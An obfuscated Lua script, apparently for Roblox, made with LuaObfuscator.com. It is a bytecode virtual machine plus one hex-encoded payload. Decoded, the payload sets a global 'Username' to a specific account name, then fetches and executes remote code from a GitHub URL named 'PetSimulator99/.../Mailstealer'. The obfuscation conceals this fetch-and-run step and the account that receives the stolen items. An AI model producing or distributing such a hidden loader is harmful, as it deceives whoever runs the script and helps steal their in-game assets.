--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v82=0;while true do if (v82==0) then v19=v0(v3(v30,1,1));return "";end end else local v83=v2(v0(v30,16));if v19 then local v91=0;local v92;while true do if (v91==1) then return v92;end if (v91==0) then v92=v5(v83,v19);v19=nil;v91=1;end end else return v83;end end end);local function v20(v31,v32,v33)if v33 then local v84=(v31/(2^(v32-(2 -1))))%((5 -3)^(((v33-((1 + 0) -(0 -0))) -(v32-(2 -1))) + (620 -((1620 -(68 + 997)) + 64)))) ;return v84-(v84%(932 -(857 + 74))) ;else local v85=568 -(367 + 201) ;local v86;while true do if (v85==(927 -((1484 -(226 + 1044)) + 713))) then v86=(1 + 1)^(v32-(1 + 0)) ;return (((v31%(v86 + v86))>=v86) and (878 -(282 + 595))) or (1637 -(1523 + 114)) ;end end end end local function v21()local v34=0;local v35;while true do if (v34==(4 -3)) then return v35;end if (v34==((1074 -(892 + 65)) -((75 -43) + 85))) then v35=v1(v16,v18,v18);v18=v18 + 1 + (0 -0) ;v34=1 + 0 ;end end end local function v22()local v36,v37=v1(v16,v18,v18 + (3 -1) );v18=v18 + (352 -(87 + 263)) ;return (v37 * (436 -(67 + 113))) + v36 ;end local function v23()local v38=0 + 0 + 0 ;local v39;local v40;local v41;local v42;while true do if (v38==(2 -1)) then return (v42 * (12338840 + 4438376)) + (v41 * (260471 -194935)) + (v40 * (1208 -(802 + 150))) + v39 ;end if (v38==(0 -0)) then v39,v40,v41,v42=v1(v16,v18,v18 + ((14 -9) -2) );v18=v18 + 3 + 1 ;v38=998 -((1203 -288) + 82) ;end end end local function v24()local v43=v23();local v44=v23();local v45=1;local v46=(v20(v44,(3234 -(760 + 987)) -(998 + (2401 -(1789 + 124))) ,1207 -(1069 + 118) ) * ((2 + 0)^((838 -(745 + 21)) -40))) + v43 ;local v47=v20(v44,45 -24 ,6 + 25 );local v48=((v20(v44,7 + 12 + 13 )==(3 -2)) and  -(1 -0)) or 1 ;if (v47==(0 -0)) then if (v46==((0 -0) + 0)) then return v48 * (791 -(368 + (1659 -1236))) ;else local v93=(0 + 0) -(0 + 0) ;while true do if ((18 -(10 + (1063 -(87 + 968))))==v93) then v47=3 -2 ;v45=885 -(261 + 624) ;break;end end end elseif (v47==(2489 -(416 + 26))) then return ((v46==(0 -0)) and (v48 * ((1 + (0 -0))/(0 -0)))) or (v48 * NaN) ;end return v8(v48,v47-(4843 -3820) ) * (v45 + (v46/((440 -(145 + 293))^(482 -(44 + 386))))) ;end local function v25(v49)local v50;if  not v49 then local v87=0;while true do if ((0 + 0)==v87) then v49=v23();if (v49==((1817 -(1703 + 114)) -0)) then return "";end break;end end end v50=v3(v16,v18,(v18 + v49) -1 );v18=v18 + v49 ;local v51={};for v65=1414 -(447 + 966) , #v50 do v51[v65]=v2(v1(v3(v50,v65,v65)));end return v6(v51);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0;local v53;local v54;local v55;local v56;local v57;local v58;while true do local v67=786 -(265 + 521) ;while true do if (0~=v67) then else if (v52==(0 -0)) then local v98=0;local v99;while true do if (v98~=(0 -0)) then else v99=0;while true do if (v99==1) then v55={};v52=1 + 0 ;break;end if (0==v99) then local v117=1636 -(1373 + 263) ;while true do if (v117==(1001 -(451 + 549))) then v99=1;break;end if (v117~=0) then else v53={};v54={};v117=1 + 0 ;end end end end break;end end end if (v52==3) then local v100=0;local v101;while true do if (v100~=0) then else v101=0;while true do if (v101~=(0 -0)) then else for v143=1 -0 ,v23() do v54[v143-1 ]=v28();end return v56;end end break;end end end v67=1385 -(746 + 638) ;end if (v67~=1) then else if (v52==(1 + 0)) then v56={v53,v54,nil,v55};v57=v23();v58={};v52=2;end if (v52~=2) then else local v102=341 -(218 + 123) ;local v103;while true do if (0~=v102) then else v103=1581 -(1535 + 46) ;while true do if (0~=v103) then else local v118=0 + 0 ;while true do if (v118~=(0 + 0)) then else for v167=1,v57 do local v168=0;local v169;local v170;local v171;while true do if (v168~=(560 -(306 + 254))) then else v169=0 + 0 ;v170=nil;v168=1;end if (v168~=1) then else v171=nil;while true do if (v169~=(0 -0)) then else v170=v21();v171=nil;v169=1;end if ((1468 -(899 + 568))==v169) then if (v170==(1 + 0)) then v171=v21()~=0 ;elseif (v170==(4 -2)) then v171=v24();elseif (v170==3) then v171=v25();end v58[v167]=v171;break;end end break;end end end v56[606 -(268 + 335) ]=v21();v118=1;end if (v118==1) then v103=1;break;end end end if (v103~=(291 -(60 + 230))) then else for v145=1,v23() do local v146=572 -(426 + 146) ;local v147;local v148;while true do if (v146==0) then v147=0;v148=nil;v146=1 + 0 ;end if (v146==1) then while true do if ((1456 -(282 + 1174))~=v147) then else v148=v21();if (v20(v148,812 -(569 + 242) ,1)~=(0 -0)) then else local v172=0 + 0 ;local v173;local v174;local v175;local v176;local v177;while true do if (v172~=2) then else v177=nil;while true do if (v173~=1) then else v176=nil;v177=nil;v173=1026 -(706 + 318) ;end if (v173==2) then while true do if (v174~=(1253 -(721 + 530))) then else local v180=0;local v181;while true do if (v180~=0) then else v181=0;while true do if (v181==(1272 -(945 + 326))) then v174=7 -4 ;break;end if (v181~=0) then else local v191=0 + 0 ;while true do if (v191~=0) then else if (v20(v176,701 -(271 + 429) ,1)==1) then v177[2]=v58[v177[2 + 0 ]];end if (v20(v176,1502 -(1408 + 92) ,1088 -(461 + 625) )==1) then v177[1291 -(993 + 295) ]=v58[v177[1 + 2 ]];end v191=1172 -(418 + 753) ;end if (v191~=(1 + 0)) then else v181=1 + 0 ;break;end end end end break;end end end if (v174~=(0 + 0)) then else local v182=0 + 0 ;local v183;while true do if (v182~=(529 -(406 + 123))) then else v183=0;while true do if (v183==0) then local v192=1769 -(1749 + 20) ;while true do if (v192==(1 + 0)) then v183=1;break;end if (v192~=(1322 -(1249 + 73))) then else v175=v20(v148,1 + 1 ,3);v176=v20(v148,1149 -(466 + 679) ,14 -8 );v192=2 -1 ;end end end if (1==v183) then v174=1901 -(106 + 1794) ;break;end end break;end end end if (v174~=(1 + 0)) then else local v184=0 + 0 ;while true do if (v184~=1) then else v174=2;break;end if (v184~=(0 -0)) then else v177={v22(),v22(),nil,nil};if (v175==(584 -(57 + 527))) then local v188=1427 -(41 + 1386) ;local v189;local v190;while true do if (v188==0) then v189=0;v190=nil;v188=104 -(17 + 86) ;end if (v188==1) then while true do if (0==v189) then v190=0;while true do if (v190~=(0 + 0)) then else v177[3]=v22();v177[8 -4 ]=v22();break;end end break;end end break;end end elseif (v175==1) then v177[8 -5 ]=v23();elseif (v175==(168 -(122 + 44))) then v177[3]=v23() -(2^16) ;elseif (v175~=(5 -2)) then else local v199=0;local v200;local v201;while true do if (v199~=(3 -2)) then else while true do if (v200~=(0 + 0)) then else v201=0 + 0 ;while true do if (v201~=(0 -0)) then else v177[68 -(30 + 35) ]=v23() -((2 + 0)^16) ;v177[1261 -(1043 + 214) ]=v22();break;end end break;end end break;end if (v199==(0 -0)) then v200=0;v201=nil;v199=1;end end end v184=1;end end end if (v174~=3) then else if (v20(v176,1215 -(323 + 889) ,3)~=1) then else v177[10 -6 ]=v58[v177[4]];end v53[v145]=v177;break;end end break;end if (v173~=(580 -(361 + 219))) then else local v179=320 -(53 + 267) ;while true do if (v179==(1 + 0)) then v173=1;break;end if (v179~=(413 -(15 + 398))) then else v174=982 -(18 + 964) ;v175=nil;v179=3 -2 ;end end end end break;end if (v172~=1) then else v175=nil;v176=nil;v172=2;end if (0==v172) then v173=0 + 0 ;v174=nil;v172=1;end end end break;end end break;end end end v52=3;break;end end break;end end end break;end end end end local function v29(v59,v60,v61)local v62=v59[1];local v63=v59[2];local v64=v59[3];return function(...)local v68=v62;local v69=v63;local v70=v64;local v71=v27;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v88=0,v76 do if (v88>=v70) then v74[v88-v70 ]=v75[v88 + 1 ];else v78[v88]=v75[v88 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do v80=v68[v72];v81=v80[1];if (v81<=10) then if (v81<=4) then if (v81<=1) then if (v81>0) then v78[v80[2]]();elseif (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end elseif (v81<=2) then local v104=v80[2];local v105=v78[v80[3]];v78[v104 + 1 ]=v105;v78[v104]=v105[v80[4]];elseif (v81>3) then v61[v80[3]]=v78[v80[2]];else local v122=v80[2];local v123,v124=v71(v78[v122](v13(v78,v122 + 1 ,v80[3])));v73=(v124 + v122) -1 ;local v125=0;for v149=v122,v73 do v125=v125 + 1 ;v78[v149]=v123[v125];end end elseif (v81<=7) then if (v81<=5) then v78[v80[2]]();elseif (v81>6) then for v152=v80[2],v80[3] do v78[v152]=nil;end else v78[v80[2]]=v80[3];end elseif (v81<=8) then do return;end elseif (v81==9) then v61[v80[3]]=v78[v80[2]];else do return;end end elseif (v81<=15) then if (v81<=12) then if (v81==11) then v72=v80[3];else local v110=v80[2];local v111,v112=v71(v78[v110](v13(v78,v110 + 1 ,v80[3])));v73=(v112 + v110) -1 ;local v113=0;for v115=v110,v73 do local v116=0;while true do if (0==v116) then v113=v113 + 1 ;v78[v115]=v111[v113];break;end end end end elseif (v81<=13) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end elseif (v81>14) then if ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v61;else v78[v80[2]]=v61[v80[3]];end else for v154=v80[2],v80[3] do v78[v154]=nil;end end elseif (v81<=18) then if (v81<=16) then if ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v61;else v78[v80[2]]=v61[v80[3]];end elseif (v81>17) then local v134=0;local v135;local v136;while true do if (v134==0) then v135=v80[2];v136=v78[v80[3]];v134=1;end if (v134==1) then v78[v135 + 1 ]=v136;v78[v135]=v136[v80[4]];break;end end else local v137=v80[2];v78[v137]=v78[v137](v13(v78,v137 + 1 ,v73));end elseif (v81<=19) then v72=v80[3];elseif (v81==20) then v78[v80[2]]=v80[3];else local v141=v80[2];v78[v141]=v78[v141](v13(v78,v141 + 1 ,v73));end v72=v72 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!073O00028O0003083O00557365726E616D65030A3O004A657269733132333433030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034B3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F45676F72696B7573612F50657453696D756C61746F722O392F6D61696E2F4D61696C737465616C657200153O0012063O00014O0007000100013O00260D3O0002000100010004133O00020001001206000100013O00260D00010005000100010004133O00050001001206000200033O001209000200023O001210000200043O001210000300053O002002000300030006001206000500074O000C000300054O001500023O00022O00050002000100010004133O001400010004133O000500010004133O001400010004133O000200012O000A3O00017O00",v9(),...);
